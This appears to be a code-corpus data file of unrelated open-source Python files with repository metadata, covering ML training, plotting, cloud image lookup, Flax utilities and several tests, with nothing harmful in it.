# 'max_features': [0.25, 0.5, ]}),
# 'rf': (RandomForestClassifier(),
# {}),
# 'xgb': (xgb.XGBClassifier(),
# {}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [600],
# 'max_depth': [9],
# "min_samples_split": [10],
# 'max_features': [0.25]}),
#
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [100,500],
# 'max_depth': [3,4,5],
# 'learning_rate': [0.1, 0.3],
# "reg_alpha": [0, 1],
# "reg_lambda": [0.1, 1]}),
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [500],
# 'max_depth': [4],
# 'learning_rate': [0.1],
# "reg_alpha": [0, 10],
# "reg_lambda": [0.1, 10]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [200, 300],
# 'learning_rate': [0.01],
# 'max_depth': [3,4,5],
# 'subsample': [0.35, 0.7],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400],
# 'learning_rate': [0.01],
# 'max_depth': [5],
# 'subsample': [0.75],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [300, 400, 500],
# 'learning_rate': [0.01, 0.003, 0.4],
# 'max_depth': [5, 6, 7],
# 'subsample': [0.85, 1],
# 'max_features': [0.25, 0.5]}),
# 'gbm': (GradientBoostingClassifier(),
# {}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [100, 200, 300, 500, 1000, 2000,
# 4000],
# 'max_depth': [2, 3, 4, 5, 6, 7,
# 9],
# 'subsample': [0.75,
# 1],
# 'max_features': ['sqrt', 'log2', 0.25, 0.5, 0.75,
# 1.0]}),
'gbm': (GradientBoostingClassifier(),
{'n_estimators': [100, 200, 400, 800],
'learning_rate': [0.03, 0.01, 0.001],
'max_depth': [4,5,6,8],
'subsample': [0.85],
'max_features': [0.25, 0.5]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400, 600],
# 'learning_rate': [0.01],
# 'max_depth': [5, 6],
# 'subsample': [0.85],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [25, 50, 75, 100, 200],
# 'max_depth': [2,3,5],
# 'subsample': [0.25, 0.5, 0.75, 1],
# 'max_features': [None, 'sqrt', 'log2', 0.5]}),
}
return(models_and_parameters)
def calc_metrics(y_true, y_pred, return_all = False):
res_df = pd.DataFrame({'y_true' : y_true,
'y_pred': y_pred}, columns = ['y_pred', 'y_true'])
res_df = res_df.sort_values(by = 'y_pred')
res_df['TN'] = (res_df.y_true == 0).cumsum()
res_df['FN'] = (res_df.y_true == 1).cumsum()
if return_all == False:
res_df = pd.concat([pd.DataFrame({'y_true' : -1,
'y_pred': -1,
"TN": 0,
"FN":0},
index = [-1],
columns = ['y_pred', 'y_true', 'TN', "FN"]),
res_df], axis = 0)
res_df['TP'] = (res_df.y_true == 1).sum() - res_df['FN']
res_df['FP'] = (res_df.y_true == 0).sum() - res_df['TN']
res_df['sens'] = res_df.TP / (res_df.TP + res_df.FN)
res_df['spec'] = res_df.TN / (res_df.TN + res_df.FP)
res_df['PPV'] = res_df.TP / (res_df.TP + res_df.FP)
res_df['accuracy'] = (res_df.TP + res_df.TN) / (res_df.shape[0])
res_df['f1_score'] = 2 * res_df.PPV * res_df.sens / (res_df.PPV + res_df.sens)
res_df['youdens_index'] = res_df.sens + res_df.spec - 1
# remove predictions which represent non-separable decision points (i.e., y_pred is equal)
if return_all == False:
res_df = res_df[(res_df.y_pred.duplicated('last') == False)]
return(res_df)
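# Hedged usage sketch (not part of the original script): calc_metrics expects
# binary ground-truth labels plus continuous scores, and the returned frame can
# be used to pick an operating threshold, e.g. by Youden's index.
#
#     metrics = calc_metrics(y_true=[0, 1, 1, 0], y_pred=[0.1, 0.8, 0.6, 0.3])
#     best_cutoff_row = metrics.loc[metrics.youdens_index.idxmax()]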
def set_up_plot():
# plt.grid(True, 'major', color = 'w', linewidth = 0.7)
plt.grid(True, 'major', color = '0.85', linewidth = 0.7)
plt.grid(True, 'minor', color = "0.92", linestyle = '-', linewidth = 0.7)
ax = plt.gca()
plt.xlim([-0.05, 1.05])
plt.ylim([-0.05, 1.05])
ax.set_axisbelow(True)
# ax.patch.set_facecolor("0.85")
def train_val(RESULT_DIR, alldata, models, label = 'Label',
cv = 5,
score_name = "AUC",
to_exclude = None,
test_ind_col = None, oversample_rate = 1,
imputer = 'iterative', add_missing_flags = True):
from medical_ML import Experiment
print('\n\n' + 'STARTING EXPERIMENT FOR ' + RESULT_DIR + '\n\n')
expt = Experiment(alldata, label = label,
to_exclude = to_exclude,
test_ind_col = test_ind_col, drop = 'all',
result_dir = RESULT_DIR)
expt.predict_models_from_groups(0, models, cv=cv, score_name=score_name, mode='classification',
oversample_rate = oversample_rate,
imputer = imputer, add_missing_flags = add_missing_flags)
expt.save_and_plot_results(models,
cv = cv, test = False)
return(expt) | 2.6875 | 3 |
cloud/caasp-admin-setup/lib/caaspadminsetup/utils.py | hwoarang/caasp-container-manifests | 5 | 5026 | <gh_stars>1-10
import json
import logging
import re
import susepubliccloudinfoclient.infoserverrequests as ifsrequest
import yaml
import sys
RELEASE_DATE = re.compile(r'^.*-v(\d{8})-*.*')
def get_caasp_release_version():
"""Return the version from os-release"""
os_release = open('/etc/os-release', 'r').readlines()
for entry in os_release:
if entry.startswith('VERSION_ID'):
version_id = entry.split('=')[-1].strip()
# We assume that os-release will always have '"' as
# version delimiters
version = version_id.strip('"\'')
logging.info('Release version: "%s"' % version)
return version
def get_cloud_config_path():
"""Return the path for the cloud configuration file"""
return '/etc/salt/pillar/cloud.sls'
def get_from_config(config_option):
"""Get the value for the given config option"""
# Expected low usage of this method, re-read the file on an as needed
# basis. If this turns out to be an issue cache the content
config_path = get_cloud_config_path()
with open(config_path) as config_file:
config = yaml.load(config_file.read())
settings = config.get('cloud')
if not settings:
return
return settings.get(config_option)
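# Illustrative example (assumption, not taken from this repo): with a
# /etc/salt/pillar/cloud.sls of the form
#
#     cloud:
#       procurement_flavor: byos
#
# get_from_config('procurement_flavor') returns 'byos', and unknown keys
# (or a missing 'cloud' section) yield None.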
def get_cluster_image_identifier(framework, region):
"""Return the identifier for the latest cluster node image"""
cluster_image = get_from_config('cluster_image')
if cluster_image:
# The data returned in this code path has built in knowledge
# about the information consumed by the client from the
# full pint data
image_data = {}
image_data['id'] = cluster_image
image_data['name'] = cluster_image
if framework == 'microsoft' and cluster_image.count(':') == 3:
image_data['urn'] = cluster_image
msg = 'Using cluster image from configuration. '
msg += 'Image data for cluster node image: "%s"'
logging.info(msg % image_data)
return image_data
name_filter = 'name~caasp,name~cluster'
flavor = get_from_config('procurement_flavor')
if flavor == 'byos':
name_filter += ',name~byos'
else:
name_filter += ',name!byos'
version = get_caasp_release_version()
name_filter += ',name~' + version.replace('.', '-')
# The cluster image we choose depends on the admin node version,
# thus we cannot just query for active images. We need to get all
# images and then process accordingly.
try:
image_info = ifsrequest.get_image_data(
framework,
None,
'json',
region,
name_filter
)
except Exception as e:
        logging.error('Pint server access failed: "%s"' % e)
# This message will bubble up through salt
return 'See /var/log/caasp_cloud_setup.log'
try:
image_data = json.loads(image_info)
available_images = image_data.get('images', [])
target_image = None
target_image_date = 0
for image in available_images:
image_name = image.get('name')
try:
date = int(RELEASE_DATE.match(image_name).group(1))
if date > target_image_date:
# If we have multiple images with the same date that
# match our filter criteria we have a serious data problem
# we cannot really recover, the first one wins
target_image = image
except Exception:
# Image name with no date stamp skip it
continue
except Exception as e:
        logging.error('Could not load json data from pint: "%s"' % e)
# This message will bubble up through salt
return 'See /var/log/caasp_cloud_setup.log'
if not target_image:
logging.error('Could not determine image identifier for cluster node.')
logging.error('This implies that the pint server is unreachable or the '
'data is incomplete, please report the issue, exiting.')
sys.exit('pint lookup failed')
logging.info('Image data for cluster node image: "%s"' % target_image)
return target_image
def load_platform_module(platform_name):
mod = __import__('caaspadminsetup.%s' % platform_name, fromlist=[''])
return mod
| 2.359375 | 2 |
tools/Bitcoin Parser/blockchain_parser/tests/test_block.py | simewu/bitcoin_researcher | 1 | 5027 | <filename>tools/Bitcoin Parser/blockchain_parser/tests/test_block.py
# Copyright (C) 2015-2016 The bitcoin-blockchain-parser developers
#
# This file is part of bitcoin-blockchain-parser.
#
# It is subject to the license terms in the LICENSE file found in the top-level
# directory of this distribution.
#
# No part of bitcoin-blockchain-parser, including this file, may be copied,
# modified, propagated, or distributed except according to the terms contained
# in the LICENSE file.
import unittest
from datetime import datetime
from .utils import read_test_data
from blockchain_parser.block import Block
class TestBlock(unittest.TestCase):
def test_from_hex(self):
block_hex = read_test_data("genesis_block.txt")
block = Block.from_hex(block_hex)
self.assertEqual(1, block.n_transactions)
block_hash = "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1" \
"b60a8ce26f"
self.assertEqual(block_hash, block.hash)
self.assertEqual(486604799, block.header.bits)
merkle_root = "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127" \
"b7afdeda33b"
self.assertEqual(merkle_root, block.header.merkle_root)
self.assertEqual(2083236893, block.header.nonce)
self.assertEqual(1, block.header.version)
self.assertEqual(1, block.header.difficulty)
self.assertEqual(285, block.size)
self.assertEqual(datetime.utcfromtimestamp(1231006505),
block.header.timestamp)
self.assertEqual("0" * 64, block.header.previous_block_hash)
for tx in block.transactions:
self.assertEqual(1, tx.version)
tx_hash = "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127" \
"b7afdeda33b"
self.assertEqual(tx_hash, tx.hash)
self.assertEqual(204, tx.size)
self.assertEqual(0, tx.locktime)
self.assertEqual(0xffffffff, tx.inputs[0].transaction_index)
self.assertEqual(0xffffffff, tx.inputs[0].sequence_number)
self.assertTrue("ffff001d" in tx.inputs[0].script.value)
self.assertEqual("0" * 64, tx.inputs[0].transaction_hash)
self.assertEqual(50 * 100000000, tx.outputs[0].value)
| 2.25 | 2 |
genegenie/admin/__init__.py | genegeniebio/genegenie-admin | 0 | 5028 | '''
DNA++ (c) DNA++ 2017
All rights reserved.
@author: neilswainston
'''
| 1.085938 | 1 |
tests/conftest.py | pkavousi/similar-users | 0 | 5029 | import os
import pandas as pd
import pytest
from user_similarity_model.config.core import DATASET_DIR, config
@pytest.fixture()
def sample_local_data():
"""AI is creating summary for sample_local_data
Returns:
[Dict]: This function returns a dictionary with CSV files which
in dataset folder. The data will be compared in tests against data
that are pulled from Azure PostgreSQL server.
"""
sample_data = {}
for file in config.app_config.csv_files:
sample_data[file[0:-4]] = pd.read_csv(os.path.join(DATASET_DIR, file))
return sample_data
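# Hedged usage sketch (illustrative only, not part of the original conftest):
# pytest injects the fixture by argument name, e.g.
#
#     def test_local_csvs_are_loaded(sample_local_data):
#         assert all(not df.empty for df in sample_local_data.values())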
| 2.421875 | 2 |
weather/apps.py | chrisjen83/rfb_weather_obs | 1 | 5030 | from django.apps import AppConfig
import logging
logger = logging.getLogger(__name__)
class WeatherConfig(AppConfig):
name = 'weather'
def ready(self):
from forecastUpdater import updater
updater.start()
| 1.976563 | 2 |
projects/django-filer/test.py | fleimgruber/python | 25 | 5031 | import filer
import tests
| 1.039063 | 1 |
examples/plots/plot_pass_network.py | DymondFormation/mplsoccer | 0 | 5032 | <reponame>DymondFormation/mplsoccer<filename>examples/plots/plot_pass_network.py
"""
============
Pass Network
============
This example shows how to plot passes between players in a set formation.
"""
import pandas as pd
from mplsoccer.pitch import Pitch
from matplotlib.colors import to_rgba
import numpy as np
from mplsoccer.statsbomb import read_event, EVENT_SLUG
##############################################################################
# Set team and match info, and get event and tactics dataframes for the defined match_id
match_id = 15946
team = 'Barcelona'
opponent = 'Alavés (A), 2018/19 La Liga'
event_dict = read_event(f'{EVENT_SLUG}/{match_id}.json', warn=False)
players = event_dict['tactics_lineup']
events = event_dict['event']
##############################################################################
# Adding on the last tactics id and formation for the team for each event
events.loc[events.tactics_formation.notnull(), 'tactics_id'] = events.loc[
events.tactics_formation.notnull(), 'id']
events[['tactics_id', 'tactics_formation']] = events.groupby('team_name')[[
'tactics_id', 'tactics_formation']].ffill()
##############################################################################
# Add the abbreviated player position to the players dataframe
formation_dict = {1: 'GK', 2: 'RB', 3: 'RCB', 4: 'CB', 5: 'LCB', 6: 'LB', 7: 'RWB',
8: 'LWB', 9: 'RDM', 10: 'CDM', 11: 'LDM', 12: 'RM', 13: 'RCM',
14: 'CM', 15: 'LCM', 16: 'LM', 17: 'RW', 18: 'RAM', 19: 'CAM',
20: 'LAM', 21: 'LW', 22: 'RCF', 23: 'ST', 24: 'LCF', 25: 'SS'}
players['position_abbreviation'] = players.player_position_id.map(formation_dict)
##############################################################################
# Add the substitutions to the players dataframe, i.e. where players are subbed on
# but the formation doesn't change
sub = events.loc[events.type_name == 'Substitution',
['tactics_id', 'player_id', 'substitution_replacement_id',
'substitution_replacement_name']]
players_sub = players.merge(sub.rename({'tactics_id': 'id'}, axis='columns'),
on=['id', 'player_id'], how='inner', validate='1:1')
players_sub = (players_sub[['id', 'substitution_replacement_id', 'position_abbreviation']]
.rename({'substitution_replacement_id': 'player_id'}, axis='columns'))
players = pd.concat([players, players_sub])
players.rename({'id': 'tactics_id'}, axis='columns', inplace=True)
players = players[['tactics_id', 'player_id', 'position_abbreviation']]
##############################################################################
# Add player position information to the events dataframe
# add on the position the player was playing in the formation to the events dataframe
events = events.merge(players, on=['tactics_id', 'player_id'], how='left', validate='m:1')
# add on the position the recipient was playing in the formation to the events dataframe
events = events.merge(players.rename({'player_id': 'pass_recipient_id'},
axis='columns'), on=['tactics_id', 'pass_recipient_id'],
how='left', validate='m:1', suffixes=['', '_receipt'])
##############################################################################
# Create dataframes for passes and player locations
# get a dataframe with all passes
mask_pass = (events.team_name == team) & (events.type_name == 'Pass')
to_keep = ['id', 'match_id', 'player_id', 'player_name', 'outcome_name', 'pass_recipient_id',
'pass_recipient_name', 'x', 'y', 'end_x', 'end_y', 'tactics_id', 'tactics_formation',
'position_abbreviation', 'position_abbreviation_receipt']
passes = events.loc[mask_pass, to_keep].copy()
print('Formations used by {} in match: '.format(team), passes['tactics_formation'].unique())
##############################################################################
# Filter passes by chosen formation, then group all passes and receipts to
# calculate avg x, avg y, count of events for each slot in the formation
formation = 433
passes_formation = passes[(passes.tactics_formation == formation) &
(passes.position_abbreviation_receipt.notnull())].copy()
passer_passes = passes_formation[['position_abbreviation', 'x', 'y']].copy()
recipient_passes = passes_formation[['position_abbreviation_receipt', 'end_x', 'end_y']].copy()
# rename columns to match those in passer_passes
recipient_passes.rename({'position_abbreviation_receipt': 'position_abbreviation',
'end_x': 'x', 'end_y': 'y'}, axis='columns', inplace=True)
# create a new dataframe containing all individual passes and receipts from passes_formation
appended_passes = pd.concat(objs=[passer_passes, recipient_passes], ignore_index=True)
average_locs_and_count = appended_passes.groupby('position_abbreviation').agg({
'x': ['mean'], 'y': ['mean', 'count']})
average_locs_and_count.columns = ['x', 'y', 'count']
##############################################################################
# Group the passes by unique pairings of players and add the avg player positions to this dataframe
# calculate the number of passes between each position (using min/ max so we get passes both ways)
passes_formation['pos_max'] = passes_formation[['position_abbreviation',
'position_abbreviation_receipt']].max(axis='columns')
passes_formation['pos_min'] = passes_formation[['position_abbreviation',
'position_abbreviation_receipt']].min(axis='columns')
passes_between = passes_formation.groupby(['pos_min', 'pos_max']).id.count().reset_index()
passes_between.rename({'id': 'pass_count'}, axis='columns', inplace=True)
# add on the location of each player so we have the start and end positions of the lines
passes_between = passes_between.merge(average_locs_and_count, left_on='pos_min', right_index=True)
passes_between = passes_between.merge(average_locs_and_count, left_on='pos_max', right_index=True,
suffixes=['', '_end'])
##############################################################################
# Calculate the line width and marker sizes relative to the largest counts
max_line_width = 18
max_marker_size = 3000
passes_between['width'] = passes_between.pass_count / passes_between.pass_count.max() * max_line_width
average_locs_and_count['marker_size'] = (average_locs_and_count['count']
/ average_locs_and_count['count'].max() * max_marker_size)
##############################################################################
# Set color to make the lines more transparent when fewer passes are made
min_transparency = 0.3
color = np.array(to_rgba('white'))
color = np.tile(color, (len(passes_between), 1))
c_transparency = passes_between.pass_count / passes_between.pass_count.max()
c_transparency = (c_transparency * (1 - min_transparency)) + min_transparency
color[:, 3] = c_transparency
##############################################################################
# Plotting
pitch = Pitch(pitch_type='statsbomb', orientation='horizontal',
pitch_color='#22312b', line_color='#c7d5cc', figsize=(16, 11),
constrained_layout=True, tight_layout=False)
fig, ax = pitch.draw()
pass_lines = pitch.lines(passes_between.x, passes_between.y,
passes_between.x_end, passes_between.y_end, lw=passes_between.width,
color=color, zorder=1, ax=ax)
pass_nodes = pitch.scatter(average_locs_and_count.x, average_locs_and_count.y, s=average_locs_and_count.marker_size,
color='red', edgecolors='black', linewidth=1, alpha=1, ax=ax)
for index, row in average_locs_and_count.iterrows():
pitch.annotate(row.name, xy=(row.x, row.y), c='white', va='center', ha='center', size=16, weight='bold', ax=ax)
title = ax.set_title("{} {} Formation vs {}".format(team, formation, opponent), size=28, y=0.97, color='#c7d5cc')
fig.set_facecolor("#22312b")
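# Note (assumption): when running this script outside a sphinx-gallery build,
# an explicit call such as `import matplotlib.pyplot as plt; plt.show()` may be
# needed to display the figure.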
| 3.078125 | 3 |
jsfiddle_factory/__init__.py | andrewp-as-is/jsfiddle-factory.py | 0 | 5033 | <filename>jsfiddle_factory/__init__.py
__all__ = ['Factory']
import jsfiddle_build
import jsfiddle_github
import jsfiddle_generator
import jsfiddle_readme_generator
import getdirs
import getfiles
import os
import popd
import yaml
@popd.popd
def _build(path):
os.chdir(path)
jsfiddle_build.Build().save("build.html")
@popd.popd
def _init(path):
os.chdir(path)
isempty = len(os.listdir(path)) == 0
isfiddle = len(
list(filter(os.path.exists, ["demo.css", "demo.js", "demo.html"]))) > 0
if isempty or isfiddle:
jsfiddle_generator.JSFiddleRepo().create()
@popd.popd
def _readme(path):
os.chdir(path)
jsfiddle_readme_generator.Readme().save("README.md")
class Factory:
"""attrs: `path`. methods: `detox()`, `init()`, `build()`, `readme()`, `update_resources()`"""
path = None
def __init__(self, path=None):
if not path:
path = os.getcwd()
self.path = path
def build_html(self):
files = getfiles.getfiles(self.path)
matches = ["demo.html", "fiddle.html"]
for f in filter(lambda f: os.path.basename(f) in matches, files):
_build(os.path.dirname(f))
def create_readme(self):
files = getfiles.getfiles(self.path)
matches = ["demo.html", "fiddle.html"]
for f in filter(lambda f: os.path.basename(f) in matches, files):
_readme(os.path.dirname(f))
def init(self):
for path in getdirs.getdirs(self.path):
_init(path)
def detox(self):
renamed = True
while renamed:
renamed = False
for path in getdirs.getdirs(self.path):
relpath = os.path.relpath(path, os.getcwd())
new_relpath = jsfiddle_github.sanitize(relpath)
new_path = os.path.join(os.getcwd(), new_relpath)
ishidden = relpath[0] == "." and "%s." % os.sep not in relpath
if not ishidden and new_relpath != relpath:
os.rename(path, new_path)
print("%s -> %s" % (path, new_path))
renamed = True
break
def update_resources(self):
f = os.path.join(self.path, "resources.txt")
if not os.path.exists(f):
print("SKIP: %s NOT EXISTS" % f)
resources = list(filter(None, open(f).read().splitlines()))
files = getfiles.getfiles(self.path)
matches = ["demo.details", "fiddle.manifest"]
for f in filter(lambda f: os.path.basename(f) in matches, files):
if os.path.exists(f):
data = yaml.load(open(f, 'r'))
if data.get("resources", []) != resources:
data["resources"] = resources
yaml.dump(data, open(f, 'w'), default_flow_style=False)
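# Hedged usage sketch (illustrative only): the factory operates on the current
# working directory by default, e.g.
#
#     factory = Factory()
#     factory.detox()             # sanitize directory names
#     factory.init()              # scaffold empty or fiddle directories
#     factory.build_html()        # write build.html next to each demo.html
#     factory.create_readme()     # write README.md next to each demo.html
#     factory.update_resources()  # sync resources.txt into demo.details / fiddle.manifest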
| 2.34375 | 2 |
spellnn/train.py | MartinXPN/SpellNN | 0 | 5034 | import logging
import os
from datetime import datetime
from inspect import signature, Parameter
from pathlib import Path
from pprint import pprint
from textwrap import dedent
from typing import Optional, Union
import fire
import tensorflow as tf
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard, TerminateOnNaN
from tensorflow.keras import Model
from spellnn import models
from spellnn.data import alphabet
from spellnn.data.alphabet import get_chars
from spellnn.data.processing import DataProcessor
from spellnn.data.util import nb_lines
from spellnn.layers.mapping import CharMapping
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # FATAL
logging.getLogger('tensorflow').setLevel(logging.FATAL)
class Gym:
def __init__(self):
self.train_dataset: Optional[tf.data.Dataset] = None
self.valid_dataset: Optional[tf.data.Dataset] = None
self.char2int: Optional[CharMapping] = None
self.model: Optional[Model] = None
self.nb_train_samples: int = 0
self.nb_valid_samples: int = 0
self.batch_size = 0
def construct_dataset(self, path: str, locale: str, batch_size: int = 32, validation_split: float = 0.3):
pprint(locals())
all_chars = [alphabet.START, alphabet.END] + get_chars(locale)
char_weights = [0.5 if c.isalpha() and c.islower() else
0.2 if c.isalpha() else
0.1 if c not in {alphabet.START, alphabet.END} else
0 for c in all_chars]
self.char2int = CharMapping(chars=all_chars, include_unknown=True)
data_processor = DataProcessor(locale=locale, char2id=self.char2int,
alphabet=all_chars, alphabet_weighs=char_weights)
print('Calculating number of lines in the file...', end=' ')
all_samples = nb_lines(path)
print(all_samples)
self.batch_size = batch_size
self.nb_train_samples = int((1 - validation_split) * all_samples)
self.nb_valid_samples = all_samples - self.nb_train_samples
dataset = tf.data.TextLineDataset(path)
self.train_dataset = dataset.take(self.nb_train_samples)
self.train_dataset = self.train_dataset.shuffle(10 * batch_size, seed=42, reshuffle_each_iteration=True)
self.train_dataset = self.train_dataset.batch(batch_size, drop_remainder=True)
self.train_dataset = self.train_dataset.map(
lambda b: tf.numpy_function(func=data_processor.process_batch, inp=[b], Tout=['int32', 'int32', 'int32']))
self.train_dataset = self.train_dataset.map(lambda enc_in, dec_in, targ: ((enc_in, dec_in), targ))
self.train_dataset = self.train_dataset.repeat()
self.valid_dataset = dataset.skip(self.nb_train_samples)
self.valid_dataset = self.valid_dataset.shuffle(10 * batch_size, seed=42, reshuffle_each_iteration=True)
self.valid_dataset = self.valid_dataset.batch(batch_size, drop_remainder=True)
self.valid_dataset = self.valid_dataset.map(
lambda b: tf.numpy_function(func=data_processor.process_batch, inp=[b], Tout=['int32', 'int32', 'int32']))
self.valid_dataset = self.valid_dataset.map(lambda enc_in, dec_in, targ: ((enc_in, dec_in), targ))
self.valid_dataset = self.valid_dataset.repeat()
return self
def create_model(self, name):
arguments = signature(getattr(models, name).__init__)
arguments = {k: v.default for k, v in arguments.parameters.items()
if v.default is not Parameter.empty and k != 'self'}
arguments['nb_symbols'] = len(self.char2int)
arg_str = ', '.join([f'{k}=' + str(v) if type(v) != str else f'{k}=' '"' + str(v) + '"'
for k, v in arguments.items()])
# print(arg_str)
exec(dedent(f'''
def create({arg_str}):
self.model = {name}(**locals())
return self
create.__name__ = {name}.__name__
create.__doc__ = {name}.__init__.__doc__
setattr(self, create.__name__, create)
'''), {'self': self, name: getattr(models, name), arg_str: arg_str})
return getattr(self, name)
def train(self, epochs: int, monitor_metric='val_acc', patience: int = 5,
steps_per_epoch: Union[int, str] = 'auto', validation_steps: Union[int, str] = 'auto',
log_dir: str = 'logs',
use_multiprocessing: bool = False):
pprint(locals())
log_dir = Path(log_dir).joinpath(datetime.now().replace(microsecond=0).isoformat())
model_path = Path(log_dir).joinpath('checkpoints').joinpath('best-model.h5py')
model_path = str(model_path)
if steps_per_epoch == 'auto':
steps_per_epoch = self.nb_train_samples // self.batch_size
if validation_steps == 'auto':
validation_steps = self.nb_valid_samples // self.batch_size
self.model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['acc'])
history = self.model.fit_generator(
self.train_dataset.as_numpy_iterator(), steps_per_epoch=steps_per_epoch,
validation_data=self.valid_dataset.as_numpy_iterator(), validation_steps=validation_steps,
epochs=epochs,
use_multiprocessing=use_multiprocessing, workers=os.cpu_count() - 1,
callbacks=[
TerminateOnNaN(),
TensorBoard(log_dir=log_dir),
ModelCheckpoint(model_path, monitor=monitor_metric, verbose=1, save_best_only=True),
EarlyStopping(monitor=monitor_metric, patience=patience),
])
return history.history
if __name__ == '__main__':
cli = Gym()
fire.Fire(cli)
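# Hedged CLI sketch (illustrative only; the model class name and flags below
# are assumptions, and the exact chaining syntax depends on python-fire):
#
#     python train.py construct_dataset --path corpus.txt --locale en \
#            create_model RNNSeq2Seq train --epochs 10
#
# Chaining works because construct_dataset returns self and create_model
# registers a constructor wrapper for the named class from spellnn.models.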
| 2.15625 | 2 |
flax/core/frozen_dict.py | juliuskunze/flax | 0 | 5035 | <filename>flax/core/frozen_dict.py
# Copyright 2020 The Flax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Frozen Dictionary."""
from typing import TypeVar, Mapping, Dict, Tuple
from flax import serialization
import jax
K = TypeVar('K')
V = TypeVar('V')
@jax.tree_util.register_pytree_node_class
class FrozenDict(Mapping[K, V]):
"""An immutable variant of the Python dict."""
__slots__ = ('_dict', '_hash')
def __init__(self, *args, **kwargs):
self._dict = dict(*args, **kwargs)
self._hash = None
def __getitem__(self, key):
v = self._dict[key]
if isinstance(v, dict):
return FrozenDict(v)
return v
def __setitem__(self, key, value):
raise ValueError('FrozenDict is immutable.')
def __contains__(self, key):
return key in self._dict
def __iter__(self):
return iter(self._dict)
def __len__(self):
return len(self._dict)
def __repr__(self):
return 'FrozenDict(%r)' % self._dict
def __hash__(self):
if self._hash is None:
h = 0
for key, value in self.items():
h ^= hash((key, value))
self._hash = h
return self._hash
def copy(self, add_or_replace: Mapping[K, V]) -> 'FrozenDict[K, V]':
"""Create a new FrozenDict with additional or replaced entries."""
return type(self)(self, **unfreeze(add_or_replace))
def items(self):
for key in self._dict:
yield (key, self[key])
def pop(self, key: K) -> Tuple['FrozenDict[K, V]', V]:
"""Create a new FrozenDict where one entry is removed.
Example::
state, params = variables.pop('params')
Args:
key: the key to remove from the dict
Returns:
A pair with the new FrozenDict and the removed value.
"""
value = self[key]
new_dict = dict(self._dict)
new_dict.pop(key)
new_self = type(self)(new_dict)
return new_self, value
def unfreeze(self) -> Dict[K, V]:
return unfreeze(self)
def tree_flatten(self):
return (self._dict,), ()
@classmethod
def tree_unflatten(cls, _, data):
return cls(*data)
def freeze(xs: Dict[K, V]) -> FrozenDict[K, V]:
"""Freeze a nested dict.
Makes a nested `dict` immutable by transforming it into `FrozenDict`.
"""
# Turn the nested FrozenDict into a dict. This way the internal data structure
# of FrozenDict does not contain any FrozenDicts.
# instead we create those lazily in `__getitem__`.
# As a result tree_flatten/unflatten will be fast
# because it operates on native dicts.
xs = unfreeze(xs)
return FrozenDict(xs)
def unfreeze(x: FrozenDict[K, V]) -> Dict[K, V]:
"""Unfreeze a FrozenDict.
Makes a mutable copy of a `FrozenDict` mutable by transforming
it into (nested) dict.
"""
if not isinstance(x, (FrozenDict, dict)):
return x
ys = {}
for key, value in x.items():
ys[key] = unfreeze(value)
return ys
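# Hedged usage sketch (illustrative): freeze/unfreeze round-trip a nested dict.
#
#     params = freeze({'dense': {'kernel': 1.0, 'bias': 0.0}})
#     params['dense']['kernel']   # -> 1.0 (read-only access)
#     mutable = unfreeze(params)  # plain nested dict, safe to mutate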
def _frozen_dict_state_dict(xs):
return {key: serialization.to_state_dict(value) for key, value in xs.items()}
def _restore_frozen_dict(xs, states):
return freeze(
{key: serialization.from_state_dict(value, states[key])
for key, value in xs.items()})
serialization.register_serialization_state(
FrozenDict,
_frozen_dict_state_dict,
_restore_frozen_dict)
| 2.421875 | 2 |
pybb/middleware.py | grigi/pybbm | 0 | 5036 | <reponame>grigi/pybbm
# -*- coding: utf-8 -*-
from django.utils import translation
from django.db.models import ObjectDoesNotExist
from pybb import util
from pybb.signals import user_saved
class PybbMiddleware(object):
def process_request(self, request):
if request.user.is_authenticated():
try:
# Here we try to load profile, but can get error
# if user created during syncdb but profile model
# under south control. (Like pybb.Profile).
profile = util.get_pybb_profile(request.user)
except ObjectDoesNotExist:
# Ok, we should create new profile for this user
# and grant permissions for add posts
user_saved(request.user, created=True)
profile = util.get_pybb_profile(request.user)
language = translation.get_language_from_request(request)
if not profile.language:
profile.language = language
profile.save()
if profile.language and profile.language != language:
request.session['django_language'] = profile.language
translation.activate(profile.language)
request.LANGUAGE_CODE = translation.get_language()
| 2.15625 | 2 |
streetlite/common/constants.py | s0h3ck/streetlite | 0 | 5037 | from enum import Enum
class CustomEnum(Enum):
@classmethod
def has_value(cls, value):
return any(value == item.value for item in cls)
@classmethod
def from_value(cls, value):
found_element = None
if cls.has_value(value):
found_element = cls(value)
return found_element
class Direction(CustomEnum):
EAST = 0x1
SOUTH = 0x2
WEST = 0x3
NORTH = 0x4
class Action(CustomEnum):
FLASH_RED = 0x32
GREEN = 0x33
FLASH_GREEN = 0x34
PEDESTRIAN = 0x35
EMERGENCY = 0x37
class Intersection(CustomEnum):
A = 0x62
B = 0x61
BOTH = 0x63
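# Hedged usage sketch (illustrative): CustomEnum adds tolerant lookup by raw value.
#
#     Direction.has_value(0x1)       # -> True
#     Direction.from_value(0x4)      # -> Direction.NORTH
#     Intersection.from_value(0x99)  # -> None for unknown values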
class Mode(CustomEnum):
LIVE = 0
SIMULATION = 1 | 3.328125 | 3 |
day5.py | achien/advent-of-code-2021 | 0 | 5038 | import fileinput
counts = {}
for line in fileinput.input():
line = line.strip()
p1, p2 = line.split('>')
p1 = p1[:-2]
